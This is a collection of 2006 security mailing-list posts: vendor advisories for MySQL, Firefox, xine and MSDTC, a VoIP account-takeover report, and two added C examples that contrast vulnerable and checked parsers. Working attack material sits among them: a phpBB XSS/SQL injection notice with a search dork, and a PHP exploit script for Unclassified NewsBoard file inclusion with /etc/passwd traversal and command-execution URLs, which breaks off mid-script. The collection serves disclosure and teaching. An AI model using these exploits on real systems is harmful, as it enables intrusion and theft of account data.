[ GLSA 200605-13 ] MySQL: Information leakage
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                   Gentoo Linux Security Advisory           GLSA 200605-13
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Low
     Title: MySQL: Information leakage
      Date: May 11, 2006
      Bugs: #132146
        ID: 200605-13

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

A MySQL server may leak information to unauthorized users.

Background
==========

MySQL is a popular multi-threaded, multi-user SQL database server.

Affected packages
=================

    -------------------------------------------------------------------
     Package          /  Vulnerable  /                      Unaffected
    -------------------------------------------------------------------
  1  dev-db/mysql        < 4.1.19                            >= 4.1.19

Description
===========

The processing of the COM_TABLE_DUMP command by a MySQL server fails to
properly validate packets that arrive from the client via a network
socket.

Impact
======

By crafting specific malicious packets an attacker could gather
confidential information from the memory of a MySQL server process, for
example results of queries by other users or applications. By using PHP
code injection or similar techniques it would be possible to exploit
this flaw through web applications that use MySQL as a database
backend. Note that on 5.x versions it is possible to overwrite the stack
and execute arbitrary code with this technique. Users of MySQL 5.x are
urged to upgrade to the latest available version.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All MySQL users should upgrade to the latest version.

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=dev-db/mysql-4.1.19"

References
==========

  [ 1 ] Original advisory
        http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2006-05/msg00041.html
  [ 2 ] CVE-2006-1516
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1516
  [ 3 ] CVE-2006-1517
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1517

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200605-13.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2006 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
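The advisory says only that COM_TABLE_DUMP handling "fails to properly validate packets" and that the result is disclosure of server memory. The following is an added example, not code from the Gentoo advisory or from the MySQL source tree: a toy model of the bug class in C. A request carries two length-prefixed strings, `[db_len][db name][tbl_len][table name]`, and the server echoes the table name back in its reply. `parse_unchecked()` trusts the embedded lengths and never consults the packet size, so a `tbl_len` larger than the packet copies whatever follows the packet in memory into the reply; `parse_checked()` bounds every attacker-derived offset by `packet_len` before using it. The packet bytes, the "adjacent memory" and the `NAME_MAX` limit are all constructed for the demonstration; the layout keeps the over-read inside one array so the program is well-defined C.

```c
/*
 * Added example; not code from the Gentoo advisory or from MySQL.
 * Models the COM_TABLE_DUMP bug class: lengths inside the packet are
 * trusted, the packet length is not checked, memory past the packet
 * leaks into the reply.
 */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define NAME_MAX 64                 /* assumed limit on a db/table name */

struct dump_req {
    char db[NAME_MAX + 1];
    char tbl[NAME_MAX + 1];
};

/* Vulnerable pattern: lengths are read from the packet, packet_len is ignored. */
int parse_unchecked(const unsigned char *pkt, size_t packet_len, struct dump_req *out)
{
    (void)packet_len;                          /* the missing validation */
    size_t db_len  = pkt[0];
    size_t tbl_len = pkt[1 + db_len];
    if (db_len > NAME_MAX || tbl_len > NAME_MAX)
        return -1;                             /* only the destination is protected */
    memcpy(out->db, pkt + 1, db_len);
    out->db[db_len] = '\0';
    memcpy(out->tbl, pkt + 2 + db_len, tbl_len);   /* may read past the packet */
    out->tbl[tbl_len] = '\0';
    return 0;
}

/* Hardened: each attacker-derived offset is checked against the packet before use. */
int parse_checked(const unsigned char *pkt, size_t packet_len, struct dump_req *out)
{
    if (packet_len < 1)
        return -1;
    size_t db_len = pkt[0];
    if (db_len > NAME_MAX || 2 + db_len > packet_len)
        return -1;                             /* tbl_len byte must lie inside the packet */
    size_t tbl_len = pkt[1 + db_len];
    if (tbl_len > NAME_MAX || 2 + db_len + tbl_len > packet_len)
        return -1;                             /* table name must lie inside the packet */
    memcpy(out->db, pkt + 1, db_len);
    out->db[db_len] = '\0';
    memcpy(out->tbl, pkt + 2 + db_len, tbl_len);
    out->tbl[tbl_len] = '\0';
    return 0;
}

/*
 * Constructed "process memory": a 5-byte crafted packet (db "db", then
 * tbl_len = 0x20 = 32 although only one byte of name is actually sent),
 * followed by data from another session, which is what an attacker hopes
 * to see echoed back.
 */
static const unsigned char memory[] =
    "\x02" "db"
    "\x20" "t"
    "SELECT card_number FROM customers WHERE id=7;";
#define PACKET_LEN 5

/* A well-formed packet: db "db", table "t". */
static const unsigned char valid_pkt[] = "\x02" "db" "\x01" "t";

/* Table name the unchecked parser reports for the crafted packet. */
const char *leaked_table_name(void)
{
    static struct dump_req r;
    if (parse_unchecked(memory, PACKET_LEN, &r) != 0)
        return "";
    return r.tbl;                              /* "tSELECT card_number FROM custome" */
}

/* Checked parser on the crafted packet: -1 (rejected). */
int checked_result_crafted(void)
{
    struct dump_req r;
    return parse_checked(memory, PACKET_LEN, &r);
}

/* Checked parser on the well-formed packet: 0 (accepted). */
int checked_result_valid(void)
{
    struct dump_req r;
    return parse_checked(valid_pkt, sizeof valid_pkt - 1, &r);
}

int main(void)
{
    printf("unchecked parser echoes: \"%s\"\n", leaked_table_name());
    printf("checked parser: crafted=%d valid=%d\n",
           checked_result_crafted(), checked_result_valid());
    return 0;
}
```

The point worth taking from the two parsers is that the `NAME_MAX` check in `parse_unchecked()` is not wrong, it is just the wrong bound: it protects the destination buffer, so nothing crashes, while the source bound (the packet) is never enforced and the reply quietly carries 31 bytes that were never sent by the client.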
phpBB "charts.php" XSS and SQL-Injection
// phpBB "charts.php" (hack) XSS and SQL-Injection //

[~] Advisory by: LoK-Crew

[-] Exploit:

http://www.example.com/charts.php?action=vote&rate=1&id=[XSS]
http://www.example.com/charts.php?action=vote&rate=1&id=[SQL]

[-] Googledork: inurl:"charts.php" "powered by phpbb"

[+] Visit: www.LoK-Crew.de
Verizon Voicewing and Linksys PAP2-VN
Product:     Verizon Voicewing combined with Linksys PAP2-VN
Reported by: Haavar Valeur
Status:      Vendor unwilling to address the problem
Reported:    Mar 15, 2006

I found that it is possible to make and receive calls from other Verizon
accounts. The problem is that Verizon publishes encrypted configuration
files containing the username and password. These files are published
through TFTP and HTTP, and are publicly readable. A vulnerability is
created because the PAP2-VN adapter trusts the web server to give it the
correct file. The PAP2 adapter accepts and decrypts configuration files
for other accounts if they are available at the URI where the adapter
expects to find its configuration file.

The following steps can be taken by anyone with a PAP2-VN adapter to
access random users' accounts:

1) Create a subnet that you are able to isolate from the internet.
2) Block all TFTP access from the subnet to the Internet. This will make
   the adapter fail over to HTTP (I did not bother to set up a TFTP
   server).
3) Redirect all HTTP requests made from the subnet to a web server you
   control (possible with e.g. iptables).
4) Connect the PAP2 adapter to the subnet and wait for the adapter to try
   to get the config file.
5) Look in the web server access log or tcpdump to find what URL the PAP2
   tries to access on the web server.
6) The URL should contain the MAC address of the PAP2. Try finding another
   valid MAC by changing one of the least significant digits, and download
   the file from Verizon's web server.
7) Rename the file you downloaded to the filename the PAP2 tried to access
   and put it on the web server so the PAP2 will download this file.
8) The PAP2 will download and decrypt this file containing the account
   information of the other user and connect to the SIP server.
9) Now you can make and receive calls from another account.

This has been tested on a PAP2-VN with firmware v2.0.10 and Verizon
Voicewing, but could apply to other vendors using this adapter.
Secunia Research: UltimateZip unacev2.dll Buffer Overflow Vulnerability
======================================================================
                     Secunia Research 11/05/2006

       - UltimateZip unacev2.dll Buffer Overflow Vulnerability -

======================================================================
Table of Contents

Affected Software....................................................1
Severity.............................................................2
Description of Vulnerability.........................................3
Solution.............................................................4
Time Table...........................................................5
Credits..............................................................6
References...........................................................7
About Secunia........................................................8
Verification.........................................................9

======================================================================
1) Affected Software

* UltimateZip version 2.7.1, 3.0.3, and 3.1b.

Other versions may also be affected.

======================================================================
2) Severity

Rating: Moderately Critical
Impact: System Access
Where:  Remote

======================================================================
3) Description of Vulnerability

Secunia Research has discovered a vulnerability in UltimateZip, which
can be exploited by malicious people to compromise a user's system.

The vulnerability is caused due to a boundary error in UNACEV2.DLL when
extracting an ACE archive containing a file with an overly long
filename. This can be exploited to cause a stack-based buffer overflow
when a user extracts a specially crafted ACE archive.

The vulnerability is related to:
SA16479

======================================================================
4) Solution

Do not extract ACE archives from untrusted sources.

======================================================================
5) Time Table

26/04/2006 - Initial vendor notification.
27/04/2006 - Second vendor notification.
04/05/2006 - Third vendor notification.
11/05/2006 - Public disclosure. (No reply from vendor)

======================================================================
6) Credits

Discovered by Secunia Research.

======================================================================
7) References

SA16479:
http://secunia.com/advisories/16479/

The Common Vulnerabilities and Exposures (CVE) project has assigned
CVE-2005-2856 for the vulnerability.

======================================================================
8) About Secunia

Secunia collects, validates, assesses, and writes advisories regarding
all the latest software vulnerabilities disclosed to the public. These
advisories are gathered in a publicly available database at the Secunia
website:

http://secunia.com/

Secunia offers services to our customers enabling them to receive all
relevant vulnerability information to their specific system
configuration.

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/secunia_security_advisories/

======================================================================
9) Verification

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2006-29/advisory/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

======================================================================
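Secunia describes the defect only as "a boundary error in UNACEV2.DLL when extracting an ACE archive containing a file with an overly long filename". The following is an added example, not Secunia's or UltimateZip's code, modelling that bug class in C. An ACE-style file header carries a 16-bit name length followed by the name bytes, and the extractor copies the name into a fixed-size buffer on the stack. `extract_unchecked()` verifies that the name lies within the archive data (the archive-side bound) but never compares it with the destination, so a name that is perfectly consistent with the archive still runs past the buffer; `extract_checked()` bounds the copy by the destination size instead. The `frame` struct stands in for a stack frame, with a sentinel after the buffer playing the part of a saved return address; the copy is done through a char view of the whole struct so the overwrite stays inside one object and the program is well-defined C. Header layout, buffer size and sentinel are assumptions made for the demonstration, not the real ACE or unacev2.dll internals.

```c
/*
 * Added example; not Secunia's or UltimateZip's code. Models the
 * unacev2.dll bug class: filename length trusted from the archive,
 * destination buffer size never consulted.
 */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define FNAME_BUF 32                 /* assumed fixed-size filename buffer */
#define SENTINEL  0xDEADBEEFu        /* stands in for a saved return address */

struct frame {
    char     fname[FNAME_BUF];
    uint32_t sentinel;
};

/* Header layout (assumed): [len lo][len hi][name bytes...]; checks only that the name fits the archive data. */
static int read_header(const unsigned char *hdr, size_t hdr_len,
                       size_t *name_len, const unsigned char **name)
{
    if (hdr_len < 2)
        return -1;
    *name_len = (size_t)hdr[0] | ((size_t)hdr[1] << 8);
    if (2 + *name_len > hdr_len)
        return -1;
    *name = hdr + 2;
    return 0;
}

/*
 * Vulnerable pattern. Returns 1 if the sentinel survived, 0 if the copy ran
 * over it, -1 if the header is malformed. The clamp to sizeof f exists only
 * to keep this demo inside the struct; the real code had no such limit.
 */
int extract_unchecked(const unsigned char *hdr, size_t hdr_len)
{
    struct frame f;
    size_t n;
    const unsigned char *name;

    f.sentinel = SENTINEL;
    if (read_header(hdr, hdr_len, &n, &name) != 0)
        return -1;
    if (n > sizeof f)
        n = sizeof f;                           /* demo-only clamp */
    memcpy((char *)&f, name, n);                /* fname sits at offset 0 */
    return f.sentinel == SENTINEL ? 1 : 0;
}

/* Hardened: the destination size is the bound, not the archive. */
int extract_checked(const unsigned char *hdr, size_t hdr_len, char *out, size_t out_len)
{
    size_t n;
    const unsigned char *name;

    if (read_header(hdr, hdr_len, &n, &name) != 0)
        return -1;
    if (n >= out_len)
        return -1;                              /* no room for name + terminator */
    memcpy(out, name, n);
    out[n] = '\0';
    return 1;
}

/* Constructed header: 16-bit little-endian length, then name_len copies of fill. */
static size_t build_header(unsigned char *buf, size_t buf_len, size_t name_len, char fill)
{
    if (buf_len < 2 + name_len)
        return 0;
    buf[0] = (unsigned char)(name_len & 0xff);
    buf[1] = (unsigned char)(name_len >> 8);
    memset(buf + 2, fill, name_len);
    return 2 + name_len;
}

int demo_crafted_unchecked(void)   /* 0: sentinel clobbered by the 36-byte name */
{
    unsigned char hdr[2 + FNAME_BUF + 4];
    size_t len = build_header(hdr, sizeof hdr, FNAME_BUF + 4, 'A');
    return extract_unchecked(hdr, len);
}

int demo_crafted_checked(void)     /* -1: rejected before any copy */
{
    unsigned char hdr[2 + FNAME_BUF + 4];
    char out[FNAME_BUF];
    size_t len = build_header(hdr, sizeof hdr, FNAME_BUF + 4, 'A');
    return extract_checked(hdr, len, out, sizeof out);
}

int demo_benign(void)              /* 1: both paths agree on a short name */
{
    unsigned char hdr[2 + 8];
    char out[FNAME_BUF];
    size_t len = build_header(hdr, sizeof hdr, 8, 'x');
    return extract_unchecked(hdr, len) == 1
        && extract_checked(hdr, len, out, sizeof out) == 1
        && strcmp(out, "xxxxxxxx") == 0;
}

int main(void)
{
    printf("crafted: unchecked=%d checked=%d; benign=%d\n",
           demo_crafted_unchecked(), demo_crafted_checked(), demo_benign());
    return 0;
}
```

Note the contrast with the MySQL case above: there the missing bound was on the source (the packet), producing a read that leaks memory; here the archive-side bound is present and the missing one is on the destination, producing a write that lands on the sentinel, which is why Secunia rates it "System Access" rather than information disclosure.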
Microsoft MSDTC NdrAllocate Validation Vulnerability
McAfee, Inc.
McAfee Avert Labs Security Advisory
Public Release Date: 2006-05-09
Microsoft MSDTC NdrAllocate Validation Vulnerability
CVE-2006-0034
______________________________________________________________________

Synopsis

There is an RPC procedure within the MSDTC interface in msdtcprx.dll
that may be called remotely without user credentials in such a way that
triggers a denial-of-service in the Distributed Transaction Coordinator
(MSDTC) service.

Exploitation can at most lead to a denial of service and therefore the
risk factor is at medium.
______________________________________________________________________

Vulnerable Systems

Microsoft Windows 2000
Microsoft Windows XP
Microsoft Windows Server 2003
______________________________________________________________________

Vulnerability Information

The msdtcprx.dll shared library contains RPC procedures for use with the
Distributed Transaction Coordinator (MSDTC) service utilized in
Microsoft Windows. By sending a large (greater than 4k) request to
BuildContextW(), a size check can be bypassed and a bug in NdrAllocate()
may be reached.

This vulnerability was reported to Microsoft on October 12, 2005.
______________________________________________________________________

Resolution

Microsoft has provided a patch for this issue. Please see their
bulletin, KB913580, for more information on obtaining and installing the
patch.
______________________________________________________________________

Credits

This vulnerability was discovered by Chen Xiaobo of McAfee Avert Labs.
______________________________________________________________________

Legal Notice

Copyright (C) 2006 McAfee, Inc.
The information contained within this advisory is provided for the
convenience of McAfee's customers, and may be redistributed provided
that no fee is charged for distribution and that the advisory is not
modified in any way. McAfee makes no representations or warranties
regarding the accuracy of the information referenced in this document,
or the suitability of that information for your purposes.

McAfee, Inc. and McAfee Avert Labs are registered Trademarks of McAfee,
Inc. and/or its affiliated companies in the United States and/or other
Countries. All other registered and unregistered trademarks in this
document are the sole property of their respective owners.
______________________________________________________________________
[SECURITY] [DSA 1055-1] New Mozilla Firefox packages fix arbitrary code execution
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 1055-1                      [EMAIL PROTECTED]
http://www.debian.org/security/                             Martin Schulze
May 11th, 2006                          http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : mozilla-firefox
Vulnerability  : programming error
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2006-1993
CERT advisory  : VU#866300
BugTraq ID     : 17671

Martijn Wargers and Nick Mott described crashes of Mozilla due to the
use of a deleted controller context. In theory this could be abused to
execute malicious code. Since Mozilla and Firefox share the same
codebase, Firefox may be vulnerable as well.

For the stable distribution (sarge) this problem has been fixed in
version 1.0.4-2sarge7 (the package versions listed below).

For the unstable distribution (sid) this problem has been fixed in
version 1.5.dfsg+1.5.0.3-1.

We recommend that you upgrade your Mozilla Firefox packages.


Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
- --------------------------------

  Source archives:

    http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge7.dsc
      Size/MD5 checksum:     1001 b182197490af4a8c07faa21ec3178291
    http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge7.diff.gz
      Size/MD5 checksum:   382272 eae0832fc7a4d408c33ff598859b95c3
    http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4.orig.tar.gz
      Size/MD5 checksum: 40212297 8e4ba81ad02c7986446d4e54e978409d

  Alpha architecture:

    http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge7_alpha.deb
      Size/MD5 checksum: 11170108 35d0f530d00b9760f9b37b6d59a7b98c
    http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-dom-inspector_1.0.4-2sarge7_alpha.deb
      Size/MD5 checksum:   168254 27b2e718d091dcff900a878dd352e2eb
    http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-gnome-support_1.0.4-2sarge7_alpha.deb
      Size/MD5 checksum:    60066 c8f22cf9f8971e69e6cc69d52ceb033a

  AMD64 architecture:

    http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge7_amd64.deb
      Size/MD5 checksum:  9401164 9b9f42d600ca975265e57c51e0fe420b
    http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-dom-inspector_1.0.4-2sarge7_amd64.deb
      Size/MD5 checksum:   162980 ae57927c8905ca478c9aaac05fd77679
    http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-gnome-support_1.0.4-2sarge7_amd64.deb
      Size/MD5 checksum:    58588 bbe086cded328a79afc3a5b5e04f1447

  ARM architecture:

    http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge7_arm.deb
      Size/MD5 checksum:  8220434 d63fdf2bc771e7903e18fc95c03d21b4
    http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-dom-inspector_1.0.4-2sarge7_arm.deb
      Size/MD5 checksum:   154458 10bee95fe87228a9107215d643b68cf7
    http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-gnome-support_1.0.4-2sarge7_arm.deb
      Size/MD5 checksum:    53918 3a1ffa2d6a7e115bc1e778dd0077044a

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge7_i386.deb
      Size/MD5 checksum:  8896786 b4905b847321b7731c1288c9d0122789
    http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-dom-inspector_1.0.4-2sarge7_i386.deb
      Size/MD5 checksum:   158256 476a15b546d7b1254cc008cb1a844ef3
    http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-gnome-support_1.0.4-2sarge7_i386.deb
      Size/MD5 checksum:    55464 fb9c72d1b12b5aa5d2dc361b77726cd7

  Intel IA-64 architecture:

    http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge7_ia64.deb
      Size/MD5 checksum: 11629186 3e1248f0329f167f5bc8eed406b06420
    http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-dom-inspector_1.0.4-2sarge7_ia64.deb
      Size/MD5 checksum:   168566 330d75c658d1223910417aee513d5a23
    http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-gnome-support_1.0.4-2sarge7_ia64.deb
[TZO-042006] Insecure Auto-Update and File execution (2)
Dear List,

As my advisory has been a bit unclear in certain regards, I would like to
briefly clarify a few questions I have received:

- The Auto update problem with Zango Adware remains, there was no fix.
- The Adware component is distributed by over 10.000 affiliates every day
  and I expect it to be installed on millions of workstations (IMO).
- If you compromise (or alter) a DNS server this gives immediate access
  to internal client machines. The impact, citing Kevin F., is:
  "Dns server pwnage and then mass client ownage"

--
http://secdev.zoller.lu
Thierry Zoller
Fingerprint : 5D84 BFDC CD36 A951 2C45 2E57 28B3 75DD 0AC6 F1C7
Unclassified NewsBoard <= 1.6.1 patch 1 ABBC[Config][smileset] arbitrary local inclusion
#!/usr/bin/php -q -d short_open_tag=on
<?php
echo "http://retrogod.altervista.org\r\n\r\n";
echo "works with register_globals = On & magic_quotes_gpc = Off\r\n\r\n";

if ($argc<6) {
  echo "Usage: php ".$argv[0]." host path user pass cmd OPTIONS\r\n";
  echo "host:      target server (ip/hostname)\r\n";
  echo "path:      path to UNB\r\n";
  echo "cmd:       a shell command\r\n";
  echo "user/pass: you need a valid user account to upload files\r\n";
  echo "Options:\r\n";
  echo "   -p[port]:    specify a port other than 80\r\n";
  echo "   -P[ip:port]: specify a proxy\r\n";
  echo "Examples:\r\n";
  echo "php ".$argv[0]." localhost /unb/ your_username password cat ./../board.conf.php\r\n";
  echo "php ".$argv[0]." localhost /unb/ your_username password ls -la -p81\r\n";
  echo "php ".$argv[0]." localhost / your_username password ls -la -P1.1.1.1:80\r\n\r\n";
  die;
}

/*
software site: http://newsboard.unclassified.de/

description: "The Unclassified NewsBoard (short UNB) is an open-source,
PHP-based internet bulletin board system"

vulnerable code in unb_lib/abbc.conf.php at lines 635-641:

...
// Smiley Definitions
if ($ABBC['Config']['smileset'])
{
    $ABBC['Config']['smilepath'] = dirname(__FILE__) . '/designs/_smile/' . $ABBC['Config']['smileset'] . '/';
    $ABBC['Config']['smileurl'] = $UNB['LibraryURL'] . 'designs/_smile/' . $ABBC['Config']['smileset'] . '/';
    @include($ABBC['Config']['smilepath'] . 'config.php');
}
...

the $ABBC['Config']['smileset'] var is not initialized before being used
to include files. You cannot access this code directly, but in
unb_lib/abbc.css.php at line 16 we have:

...
require('abbc.conf.php');
...

this script is not protected by the unb_lib folder .htaccess file:

# Don't allow direct PHP requests in this directory
Order allow,deny
Deny from all
Order allow,deny
Deny from all

so, if register_globals = On & magic_quotes_gpc = Off, you can include
files from local resources, poc:

http://[target]/[path]/unb_lib/abbc.css.php?ABBC[Config][smileset]=../../../../../../../../../etc/passwd%00
http://[target]/[path]/unb_lib/abbc.css.php?ABBC[Config][smileset]=../../upload/avatar_[user_id].jpeg%00&cmd=ls%20-la
http://[target]/[path]/unb_lib/abbc.css.php?ABBC[Config][smileset]=../../upload/photo_[user_id].jpeg%00&cmd=ls%20-la

this script tries to include an avatar or photo with malicious php code
inside, you need a valid account to upload files
*/

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

// Hex/ASCII dump of a string, 15 bytes per row (used for debugging responses).
function quick_dump($string)
{
  $result='';$exa='';$cont=0;
  for ($i=0; $i<=strlen($string)-1; $i++)
  {
    if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
      {$result.="  .";}
    else
      {$result.="  ".$string[$i];}
    if (strlen(dechex(ord($string[$i])))==2)
      {$exa.=" ".dechex(ord($string[$i]));}
    else
      {$exa.=" 0".dechex(ord($string[$i]));}
    $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
  }
  return $exa."\r\n".$result;
}

// ip:port, using ( ) as the PCRE delimiters
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';

// Send a raw HTTP request (directly or via proxy) and leave the reply in $html.
function sendpacketii($packet)
{
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
      echo 'No response from '.$host.':'.$port; die;
    }
  }
  else {
    $c = preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo 'Not a valid proxy...';die;
    }
    $parts=explode(':',$proxy);
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
      echo 'No response from proxy...';die;
    }
  }
  fputs($ock,$packet);
  if ($proxy=='') {
    $html='';
    while (!feof($ock)) {
      $html.=fgets($ock);
    }
  }
  else {
    $html='';
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
      $html.=fread($ock,1);
    }
  }
  fclose($ock);
  #debug
  #echo "\r\n".$html;
}

$host=$argv[1];
$path=$argv[2];
$username=$argv[3];
$pass=$argv[4];
$cmd="";$port=80;$proxy="";

// remaining args: the shell command, optionally -p[port] / -P[ip:port]
for ($i=5; $i<=$argc-1; $i++){
  $temp=$argv[$i][0].$argv[$i][1];
  if (($temp<>"-p") and ($temp<>"-P"))
    {$cmd.=" ".$argv[$i];}
  if ($temp=="-p")
  {
    $port=str_replace("-p","",$argv[$i]);
  }
  if ($temp=="-P")
  {
    $proxy=str_replace("-P","",$argv[$i]);
  }
}
$cmd=urlencode($cmd);
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

echo "step 0 -> check if suntzu.php is already installed...\r\n";
$packet ="GET ".$p."unb_lib/suntzu.php HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: cmd=".$cmd.";\r\n";
$packet.="Connection: Close\r\n\r\n";
Re: Oracle - the last word
David Litchfield said:

> When Oracle 10g Release 1 was released you could spend a day looking
> for bugs and find thirty. When 10g Release 2 was released I had to
> spend two weeks looking to find the same number.

This increasing level of effort is likely happening for other major
widely audited software products, too. It would be a very useful data
point if researchers could publicly quantify how much time and effort
they needed to find the issues (note: this is not my idea, it came out
of various other discussions.) Level of effort might provide a more
concrete answer to the question "how secure is software X?"

Some researchers might not want to publicize this kind of information,
but this would be one great way to help us move away from the primitive
practice of counting the number of reported vulnerabilities.

(and while I'm talking about quantifying researcher effort, it might be
highly illustrative to measure how much time is spent in dealing with
vendors during disclosure.)

- Steve
[ MDKSA-2006:085 ] - Updated xine-ui packages fix format string vulnerabilities
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDKSA-2006:085
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : xine-ui
 Date    : May 10, 2006
 Affected: 2006.0, Corporate 3.0
 _______________________________________________________________________

 Problem Description:

 Multiple format string vulnerabilities in xiTK (xitk/main.c) in xine
 allow remote attackers to execute arbitrary code via format string
 specifiers in a long filename on an EXTINFO line in a playlist file.

 Packages have been patched to correct this issue.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1905
 _______________________________________________________________________

 Updated Packages:

 Mandriva Linux 2006.0:
 650fe424e812f24ca55fbae9ac58f191  2006.0/RPMS/xine-ui-0.99.4-1.1.20060mdk.i586.rpm
 93642d5dcbf76bdb55f6a1b79a82a740  2006.0/RPMS/xine-ui-aa-0.99.4-1.1.20060mdk.i586.rpm
 233e02e5d13ea968b7497a67df0094a9  2006.0/RPMS/xine-ui-fb-0.99.4-1.1.20060mdk.i586.rpm
 f4b89ad1d813c792c5700861b360066f  2006.0/SRPMS/xine-ui-0.99.4-1.1.20060mdk.src.rpm

 Mandriva Linux 2006.0/X86_64:
 71e490c1d0941c5c93601968165af681  x86_64/2006.0/RPMS/xine-ui-0.99.4-1.1.20060mdk.x86_64.rpm
 263a49cfbf4be6832af2f583b0e30ea8  x86_64/2006.0/RPMS/xine-ui-aa-0.99.4-1.1.20060mdk.x86_64.rpm
 2f6a5637fd940883b8381491dc1fa403  x86_64/2006.0/RPMS/xine-ui-fb-0.99.4-1.1.20060mdk.x86_64.rpm
 f4b89ad1d813c792c5700861b360066f  x86_64/2006.0/SRPMS/xine-ui-0.99.4-1.1.20060mdk.src.rpm

 Corporate 3.0:
 19461fcb7b20d100d804d59a156d47e9  corporate/3.0/RPMS/xine-ui-0.9.23-3.3.C30mdk.i586.rpm
 e72a7090b1027ffd1d051785ba638d2b  corporate/3.0/RPMS/xine-ui-aa-0.9.23-3.3.C30mdk.i586.rpm
 9f735f80528fbe7645819b8c7ee1392e  corporate/3.0/RPMS/xine-ui-fb-0.9.23-3.3.C30mdk.i586.rpm
 70b43223c2a42e044cc92e6721b9c074  corporate/3.0/SRPMS/xine-ui-0.9.23-3.3.C30mdk.src.rpm

 Corporate 3.0/X86_64:
 40d8285c71ff0b1c6649576ba98bb1d3  x86_64/corporate/3.0/RPMS/xine-ui-0.9.23-3.3.C30mdk.x86_64.rpm
 a8ed9fe1599138cfa39dc8a748bbcb3d  x86_64/corporate/3.0/RPMS/xine-ui-aa-0.9.23-3.3.C30mdk.x86_64.rpm
 53a46955f3dff408ff65995043ec30da  x86_64/corporate/3.0/RPMS/xine-ui-fb-0.9.23-3.3.C30mdk.x86_64.rpm
 70b43223c2a42e044cc92e6721b9c074  x86_64/corporate/3.0/SRPMS/xine-ui-0.9.23-3.3.C30mdk.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi. The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security. You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

